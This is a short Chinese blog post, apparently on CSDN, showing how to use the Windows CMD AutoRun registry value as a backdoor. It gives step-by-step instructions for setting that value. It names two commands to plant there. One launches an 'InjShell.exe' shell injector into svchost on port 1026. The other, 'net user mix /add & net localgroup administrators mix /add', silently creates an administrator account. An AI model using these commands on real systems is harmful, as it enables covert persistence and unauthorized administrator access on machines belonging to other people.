蓝法典的专栏

社会如此,我能怎样!

后门

Mix老装一幅正人君子的样子,说写文档,哼哼。。。。

无聊,cmd /?后看见好多东西,其中有个好玩的: 
******************* 
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 
两个都存在,这两个变量会先被执行。 

HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun 

和/或 

HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun 
****************** 
呵呵,又是一个放后门的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 后,打开CMD什么异常现象都没有(当然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 岂不是成了《不死帐号》续集?大家自己琢磨吧~~~ 

有人问具体的做法,随手写写,还不懂的话,就是我的表达能力有问题了 :)呵呵 

先用regedit打开HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ,看见这个主健下是不是有AutoRun健,将AutoRun键值改为你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ,有人使用cmd的话,就会自动执行你设置的命令。 

阅读更多
文章标签: cmd 文档 c
个人分类: 网上收集
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭